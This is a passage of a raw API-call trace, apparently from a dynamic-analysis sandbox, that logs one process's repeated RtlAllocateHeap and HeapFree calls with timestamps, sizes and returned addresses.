0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e84b8 | out: hHeap=0x2b0000) returned 1 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8770 | out: hHeap=0x2b0000) returned 1 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e85c8 | out: hHeap=0x2b0000) returned 1 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8880 | out: hHeap=0x2b0000) returned 1 [0032.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e84b8 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8548 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e85d8 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8668 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e86f8 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8788 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8818 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e88a8 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8938 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e89c8 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8a58 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ae8 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8b78 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0032.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0032.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0032.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0032.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0032.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0032.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0032.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e84b8 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8548 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e85d8 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8668 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e86f8 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8788 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8818 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e88a8 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8938 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e89c8 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8a58 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ae8 | out: hHeap=0x2b0000) returned 1 [0032.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8b78 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8208 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8298 | out: hHeap=0x2b0000) returned 1 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2e8208 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2eac08 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e80f0 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2ead10 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae20 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e80f0 | out: hHeap=0x2b0000) returned 1 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e84b8 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9640 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e85c8 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae20 | out: hHeap=0x2b0000) returned 1 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e84b8 | out: hHeap=0x2b0000) returned 1 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead10 | out: hHeap=0x2b0000) returned 1 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e85c8 | out: hHeap=0x2b0000) returned 1 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2eac08 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e80f0 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2ead10 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae20 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e80f0 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e84b8 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9640 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e85c8 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, 